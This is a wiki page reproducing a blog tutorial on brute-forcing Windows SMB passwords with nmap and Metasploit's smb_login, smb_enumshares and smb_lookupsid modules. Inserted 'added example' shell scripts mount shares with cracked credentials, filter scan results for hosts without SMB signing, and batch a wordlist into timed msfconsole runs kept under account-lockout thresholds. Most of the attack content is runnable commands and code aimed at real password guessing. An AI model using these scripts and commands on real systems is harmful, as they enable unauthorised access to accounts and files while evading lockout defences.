Difference between revisions of "Kali Linux: Membobol File Sharing Password di Windows 7" (Kali Linux: Cracking File Sharing Passwords on Windows 7)

From OnnoWiki
 
Source: https://sathisharthars.wordpress.com/2014/06/25/brute-force-smb-shares-in-windows-7-using-metasploit/

Brute-force SMB Shares in Windows 7 using Metasploit
 
June 25, 2014

An attacker will take the path of least resistance in order to gain access to critical systems and data. During a penetration test we take the same tactic.

Frequently this is accomplished by guessing the password of a user's account and then either using the privileges of that account to gain access to critical data or escalating that account to an administrator or root level account. Once credentials have been acquired for one host you will want to determine what other systems they work against. It is fairly common to gain access to a local administrator account on a workstation or server.

There are a number of ways to accomplish this task, but one of the most efficient is the smb_login module of the Metasploit Framework, which tests a single username/password combination against a lot of boxes very quickly.

This is where the SMB Login Check Scanner can be very useful, as it will connect to a range of hosts and determine whether the username/password combination can access the target.

So in today's tutorial we are going to make brute-force login attempts against Windows shares to obtain SMB credentials, using the tools in Kali Linux.

First we run an nmap scan against the target to enumerate SMB. My target IP is 192.168.31.2 and I fingerprint the OS with the -A option, which enables OS and version detection, script scanning and traceroute (so the -O below is redundant; -sS needs root).

#nmap -sS  -A -O  192.168.31.2
 
 
 
 
 
 
Screenshot from 2014-06-24 03:32:42
 
 
 
 
 
 
 
 
 
 
The nmap results show that the target machine runs SMB with user-level authentication (smb-security-mode reports authentication_level: user), so we can authenticate to SMB with a username and password.

Next we use the Metasploit Framework to brute-force the login against the target's SMB service, with the smb_login module in msfconsole.

Metasploit's smb_login module will attempt to log in via SMB across a provided range of IP addresses.

msfconsole

msf > use auxiliary/scanner/smb/smb_login
msf auxiliary(smb_login) > show options
msf auxiliary(smb_login) > set RHOSTS 192.168.31.2
msf auxiliary(smb_login) > set SMBUser sathish
msf auxiliary(smb_login) > set PASS_FILE /home/sathish/password
msf auxiliary(smb_login) > set THREADS 10
msf auxiliary(smb_login) > run

 
 
 
 
 
 
 
 
Above I set SMBUser to sathish because my target machine's computer name is sathish-PC, so there is a good chance an account named sathish exists; the password is then brute-forced from a word list in my home directory.

Screenshot from 2014-06-24 13:28:53

Keep in mind that this is very "loud": every attempt shows up as a failed logon (event ID 4625) in the Security event log of each Windows box it touches. Be thoughtful about the network on which you take this action.

Screenshot from 2014-06-24 13:29:29

After a successful brute-force login, we enumerate the SMB shares on the target machine with the credentials we now know.

The smb_enumshares module, as would be expected, enumerates any SMB shares that are available on a remote system.

msf > use auxiliary/scanner/smb/smb_enumshares
msf auxiliary(smb_enumshares) > show options
msf auxiliary(smb_enumshares) > set RHOSTS 192.168.31.2
msf auxiliary(smb_enumshares) > set SMBUser sathish
msf auxiliary(smb_enumshares) > set SMBPass bhuvi
msf auxiliary(smb_enumshares) > set THREADS 10
msf auxiliary(smb_enumshares) > run

 
 
 
 
 
 
 
 
Screenshot from 2014-06-24 13:31:34
 
 
 
 
 
 
 
 
Screenshot from 2014-06-24 13:32:26
 
 
 
 
 
 
 
 
 
 
It will list the SMB shares on the target machine. Next we want more detail about the target, namely the SIDs of its users and groups.

The smb_lookupsid module brute-forces SID lookups on a range of targets to determine which local users exist on the system. Knowing which users exist helps with logging in.

msf > use auxiliary/scanner/smb/smb_lookupsid
msf auxiliary(smb_lookupsid) > show options
msf auxiliary(smb_lookupsid) > set RHOSTS 192.168.31.2
msf auxiliary(smb_lookupsid) > set SMBUser sathish
msf auxiliary(smb_lookupsid) > set SMBPass bhuvi
msf auxiliary(smb_lookupsid) > run

Screenshot from 2014-06-24 13:34:11
 
 
 
 
 
 
Screenshot from 2014-06-24 13:37:28
 
 
 
 
 
 
It lists the users and groups on the target machine with their SIDs, which tells us more about the target system. With the known user credentials we then mount the Windows share on our attacking computer.

Screenshot from 2014-06-24 14:08:07
 
 
 
 
 
 
Screenshot from 2014-06-24 19:44:03
 
 
 
 
 
 
 
 
 
 
Screenshot from 2014-06-24 14:11:08
 
 
 
 
Screenshot from 2014-06-24 19:41:43
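The blog shows the mount itself only in screenshots. As an added example, not code from the page or from the blog, the POSIX shell below writes the recovered credentials into a mode-0600 credentials file and builds the mount command from it, so the password never shows up in ps output or shell history, and it mounts read-only with nosuid,nodev,noexec because whatever sits on the share is untrusted. The vers=1.0 default is an assumption tied to this page's second target: the scan of the Samba 3.x NAS reported that it does not support SMBv2, and current Linux kernels will not fall back to SMB1 unless told to, so that option should be dropped for a modern Windows host. Share name, mount point and user below are placeholders.

```shell
#!/bin/sh
# Added example (not from the OnnoWiki page or the source blog): mount a
# share with recovered credentials without exposing the password.

# make_creds_file PATH USER PASSWORD [DOMAIN]
#   Write a mount.cifs credentials file readable only by the owner.
#   A newline inside any field would inject a second key=value line,
#   so such input is rejected; commas are fine here, which is one reason
#   to prefer the file over -o password=... on the command line.
make_creds_file() {
    path=$1; user=$2; pass=$3; domain=${4:-WORKGROUP}
    nl=$(printf '\nx'); nl=${nl%x}
    case "$user$pass$domain" in
        *"$nl"*) echo "newline in credential field" >&2; return 1 ;;
    esac
    old_umask=$(umask)
    umask 077
    printf 'username=%s\npassword=%s\ndomain=%s\n' "$user" "$pass" "$domain" > "$path"
    umask "$old_umask"
}

# mount_cmd SERVER SHARE MOUNTPOINT CREDSFILE [VERS]
#   Print the mount command: credentials from the file, read-only, and no
#   suid/device/exec semantics for files coming off an untrusted share.
#   VERS defaults to 1.0 because the NAS on this page only speaks SMB1
#   (assumption for this lab; omit it for SMB2/3 servers).
mount_cmd() {
    printf 'mount -t cifs //%s/%s %s -o credentials=%s,vers=%s,ro,nosuid,nodev,noexec\n' \
        "$1" "$2" "$3" "$4" "${5:-1.0}"
}

# Usage (placeholders: share name and mount point are not from the page):
#   make_creds_file /root/.smbcreds onno 's3cr3t'
#   mkdir -p /mnt/nas && sh -c "$(mount_cmd 192.168.0.7 share /mnt/nas /root/.smbcreds)"
```

Pass an explicit fifth argument (for example 3.0) when the target is a current Windows machine; the credentials file format is the one mount.cifs documents (username=, password=, domain=), so the same file works for smbclient -A as well.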
 
 
 
 
 
 
[Note]

A brute force attack, or any aggressive password guessing attack, is very noisy and will likely lock out user accounts, depending on how the group policies for that domain have been configured.

So brute forcing Windows accounts isn't generally a very good idea, because of lockout settings and the possibility of creating a denial of service condition. Most Windows networks have group policies that enforce a lockout of X minutes after Y failed attempts, so a long word list against one account is pretty much too risky; if guessing is needed at all, stay below Y attempts per account within each X-minute window.
 
Latest revision as of 11:36, 23 April 2020

Source: https://sathisharthars.wordpress.com/2014/06/25/brute-force-smb-shares-in-windows-7-using-metasploit/



Network Scan

Example

nmap -sS  -A -O  192.168.0.7
nmap -sS  -A -O  192.168.0.0/24
nmap -sS  -A -O  192.168.0.7,90

The first form scans one host, the second the whole /24, and the third only .7 and .90. -A already turns on OS detection, version detection, default scripts and traceroute, so -O adds nothing here; -sS (SYN scan) needs root.


Example output

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-02-11 07:41 WIB
Nmap scan report for 192.168.0.7
Host is up (0.0027s latency).
Not shown: 989 closed ports
PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 3.7.1p2 (protocol 2.0)
| ssh-hostkey: 
|_  1024 17:60:bb:44:2f:36:d8:df:6b:98:fb:63:7f:52:a7:a1 (RSA)
80/tcp    open  http        lighttpd 1.4.31
|_http-server-header: lighttpd/1.4.31
|_http-title: Site doesn't have a title (text/html).
139/tcp   open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
443/tcp   open  ssl/http    lighttpd 1.4.31
| http-cisco-anyconnect: 
|_  ERROR: Not a Cisco ASA or unsupported version
|_http-server-header: lighttpd/1.4.31
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=develop/organizationName=buffalo/stateOrProvinceName=Tokyo/countryName=JP
| Not valid before: 2007-06-13T05:47:53 
|_Not valid after:  2027-06-08T05:47:53
|_ssl-date: 2016-02-10T23:18:49+00:00; -1h25m51s from scanner time.
445/tcp   open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
873/tcp   open  rsync       (protocol version 30)
8873/tcp  open  ssl/rsync   (protocol version 30)
9001/tcp  open  http        libwww-perl-daemon httpd 1.36
| http-cisco-anyconnect: 
|_  ERROR: Not a Cisco ASA or unsupported version
| http-robots.txt: 1 disallowed entry 
|_/
|_http-title: Squeezebox Server
9050/tcp  open  upnp        TwonkyMedia UPnP (Linux 2.X.X; UPnP 1.0; pvConnect SDK 1.0; SDK 1.1)
9090/tcp  open  http        uTorrent WebUI
|_http-methods: No Allow or Public header in OPTIONS response (status code 400)
|_http-title: Site doesn't have a title (text/html).
22939/tcp open  ssl/unknown
MAC Address: 4C:E6:76:1F:15:4C (Buffalo)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=6.49BETA4%E=4%D=2/11%OT=22%CT=1%CU=42073%PV=Y%DS=1%DC=D%G=Y%M=4CE
OS:676%TM=56BBD996%P=x86_64-pc-linux-gnu)SEQ(SP=D6%GCD=1%ISR=D3%TI=Z%CI=Z%T
OS:S=A)SEQ(SP=C1%GCD=1%ISR=C8%TI=Z%CI=Z%II=I%TS=A)OPS(O1=M5B4ST11NW7%O2=M5B
OS:4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O5=M5B4ST11NW7%O6=M5B4ST11)WIN(W
OS:1=16A0%W2=16A0%W3=16A0%W4=16A0%W5=16A0%W6=16A0)ECN(R=Y%DF=Y%T=40%W=16D0%
OS:O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=
OS:Y%DF=Y%T=40%W=16A0%S=O%A=S+%F=AS%O=M5B4ST11NW7%RD=0%Q=)T4(R=Y%DF=Y%T=40%
OS:W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=
OS:)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=
OS:S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RU
OS:CK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S) 

Network Distance: 1 hop
Service Info: OSs: Linux, Windows; CPE: cpe:/o:linux:linux_kernel:2, cpe:/o:microsoft:windows 

Host script results:
|_nbstat: NetBIOS name: TS-WVHL54C, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Unix (Samba 3.6.3-31a.osstech)
|   Computer name: TS-WVHL54C
|   NetBIOS computer name: 
|   Domain name: 
|   FQDN: TS-WVHL54C
|_  System time: 2016-02-11T06:18:51+07:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smbv2-enabled: Server doesn't support SMBv2 protocol 

TRACEROUTE
HOP RTT     ADDRESS
1   2.71 ms 192.168.0.7 

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 205.58 seconds
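The scan step in both halves of this page (the blog's nmap -A against 192.168.31.2 and the NAS output above) is read by eye. As an added example, not from the OnnoWiki page or the source blog, the POSIX shell below parses nmap's normal output and reports, per host, whether 139/445 are open, the smb-os-discovery banner, and the message_signing state; hosts with SMB open whose server does not require signing are the ones worth pointing smb_login at (and, separately, the ones exposed to NTLM relay). The embedded sample is constructed: the 192.168.0.7 block is copied from the output above, while 192.168.0.1 and 192.168.0.9 are invented to exercise the filter.

```shell
#!/bin/sh
# Added example (not from the OnnoWiki page or the source blog): summarise
# nmap -A normal output per host for SMB targeting.
# The sample is constructed: 192.168.0.7 is the NAS from the page's own
# scan; 192.168.0.1 and 192.168.0.9 are invented to exercise the filter.

SAMPLE_NMAP=$(cat <<'EOF'
Nmap scan report for 192.168.0.1
Host is up (0.0011s latency).
PORT   STATE SERVICE VERSION
80/tcp open  http    lighttpd 1.4.31
Nmap scan report for 192.168.0.7
Host is up (0.0027s latency).
PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 3.7.1p2 (protocol 2.0)
139/tcp   open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp   open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
Host script results:
| smb-os-discovery:
|   OS: Unix (Samba 3.6.3-31a.osstech)
|   Computer name: TS-WVHL54C
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
Nmap scan report for 192.168.0.9
Host is up (0.0010s latency).
PORT    STATE SERVICE      VERSION
445/tcp open  microsoft-ds Windows 7 Ultimate 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
Host script results:
| smb-os-discovery:
|   OS: Windows 7 Ultimate 7601 Service Pack 1 (Windows 7 Ultimate 6.1)
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
EOF
)

# smb_summary: read nmap normal output on stdin, print one line per host:
#   <ip> smb=open|closed signing=<state|unknown> os=<smb-os-discovery OS or ?>
smb_summary() {
    awk '
        function flush() {
            if (host != "")
                printf "%s smb=%s signing=%s os=%s\n", host, smb, sign, os
        }
        # a new host block: emit the previous one and reset state
        /^Nmap scan report for / {
            flush()
            host = $NF; gsub(/[()]/, "", host)   # "name (ip)" form -> ip
            smb = "closed"; sign = "unknown"; os = "?"
        }
        /^(139|445)\/tcp +open/ { smb = "open" }
        # OS line from the smb-os-discovery host script
        /^[|]_? +OS: / { os = $0; sub(/^[|]_? +OS: /, "", os) }
        # smb-security-mode: disabled / supported / required
        /message_signing: / {
            if (match($0, /message_signing: [a-z]+/))
                sign = substr($0, RSTART + 17, RLENGTH - 17)
        }
        END { flush() }
    '
}

# smb_targets: hosts with SMB open whose server does not require signing
smb_targets() {
    smb_summary | grep 'smb=open' | grep -v 'signing=required' | awk '{ print $1 }'
}

demo_summary() { printf '%s\n' "$SAMPLE_NMAP" | smb_summary; }
demo_targets() { printf '%s\n' "$SAMPLE_NMAP" | smb_targets; }

# Usage: sh smb_summary.sh --demo            (embedded sample)
#        sh smb_summary.sh --file scan.nmap  (from: nmap -A -oN scan.nmap <targets>)
case "${1:-}" in
    --demo) demo_targets ;;
    --file) smb_targets < "${2:?scan file}" ;;
esac
```

Hosts with SMB open but no smb-security-mode output (the host script only runs when nmap can negotiate a session) come back as signing=unknown and are kept by smb_targets, so they still need a manual look.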

Hack Password

Brute force is used to hack the password. This method is quite "noisy" because everything we do is recorded / logged by the server, so it will be noticed. Note that the scan above already obtained a session as guest (account_used: guest under smb-security-mode), so check what that session can enumerate before spending failed attempts on a brute force.

msfconsole
use auxiliary/scanner/smb/smb_login
show options
set RHOSTS 192.168.0.7
set SMBUser onno
set PASS_FILE /home/onno/password.txt
set THREADS 10
run
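The "noisy" warning above and the blog's note about lockouts point at the same discipline: keep the number of guesses per account below the lockout threshold within each observation window, and stop as soon as a password hits. As an added example, not from the page, the blog or Metasploit itself, the POSIX shell below splits a wordlist into batches of threshold minus one, writes one msfconsole resource script per batch (the same smb_login options as above, plus STOP_ON_SUCCESS and a low BRUTEFORCE_SPEED), and prints a run plan that sleeps for the full window between batches. The threshold and window in the usage line are lab assumptions; read the real values from the target's policy (net accounts on a domain member) first. A Samba host may or may not enforce a lockout, and either way every failure lands in its log.

```shell
#!/bin/sh
# Added example (not from the OnnoWiki page, the source blog or Metasploit):
# lockout-aware batching of an smb_login run.

# spray_batches WORDLIST THRESHOLD OUTDIR
#   Split WORDLIST into OUTDIR/batch-N.txt files of at most THRESHOLD-1
#   passwords each, so one batch can never reach the lockout threshold.
#   Prints the number of batches written.
spray_batches() {
    wordlist=$1; threshold=$2; outdir=$3
    per_batch=$((threshold - 1))
    if [ "$per_batch" -lt 1 ]; then
        echo "lockout threshold must be at least 2" >&2
        return 1
    fi
    mkdir -p "$outdir"
    awk -v n="$per_batch" -v d="$outdir" '
        {
            b = int((NR - 1) / n) + 1
            if (b != cur) { if (cur) close(f); cur = b; f = d "/batch-" b ".txt" }
            print > f
        }
        END { print cur + 0 }' "$wordlist"
}

# spray_rc RHOSTS USER BATCHFILE OUTFILE
#   Write an msfconsole resource script for one batch. STOP_ON_SUCCESS stops
#   guessing as soon as a password works, so no further failures are logged
#   against that account; BRUTEFORCE_SPEED 1 spaces the attempts out.
spray_rc() {
    rhosts=$1; user=$2; batch=$3; out=$4
    cat > "$out" <<EOF
use auxiliary/scanner/smb/smb_login
set RHOSTS $rhosts
set SMBUser $user
set PASS_FILE $batch
set THREADS 1
set BRUTEFORCE_SPEED 1
set STOP_ON_SUCCESS true
set VERBOSE false
run
exit
EOF
}

# spray_plan WORDLIST THRESHOLD WINDOW_MIN RHOSTS USER OUTDIR
#   Print the commands to run: one msfconsole invocation per batch, with a
#   sleep of the whole observation window between batches so the target's
#   failed-attempt counter has reset before the next batch starts.
spray_plan() {
    wordlist=$1; threshold=$2; window=$3; rhosts=$4; user=$5; outdir=$6
    n=$(spray_batches "$wordlist" "$threshold" "$outdir") || return 1
    i=1
    while [ "$i" -le "$n" ]; do
        spray_rc "$rhosts" "$user" "$outdir/batch-$i.txt" "$outdir/batch-$i.rc"
        printf 'msfconsole -q -r %s\n' "$outdir/batch-$i.rc"
        if [ "$i" -lt "$n" ]; then
            printf 'sleep %d\n' $((window * 60))
        fi
        i=$((i + 1))
    done
}

# Usage (3 and 30 are lab values; take THRESHOLD/WINDOW from the real policy):
#   spray_plan /home/onno/password.txt 3 30 192.168.0.7 onno /tmp/spray > run.sh
```

Redirecting spray_plan to a file and running that file with sh gives a resumable plan: if a batch succeeds, STOP_ON_SUCCESS ends that msfconsole run early and the remaining batches can simply be deleted from the script.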


Using the smb_enumshares module, we can enumerate every SMB share available on the remote system. The target is the host scanned above (192.168.0.7) and the credentials are the ones smb_login found.

use auxiliary/scanner/smb/smb_enumshares
show options
set RHOSTS 192.168.0.7
set SMBUser onno
set SMBPass s3cr3t
set THREADS 10
run


The smb_lookupsid module brute-forces SID lookups on a range of targets to determine which local users exist on the system. SMBUser takes the username and SMBPass the password.

use auxiliary/scanner/smb/smb_lookupsid
show options
set RHOSTS 192.168.0.7
set SMBUser onno
set SMBPass s3cr3t
run

References

* https://sathisharthars.wordpress.com/2014/06/25/brute-force-smb-shares-in-windows-7-using-metasploit/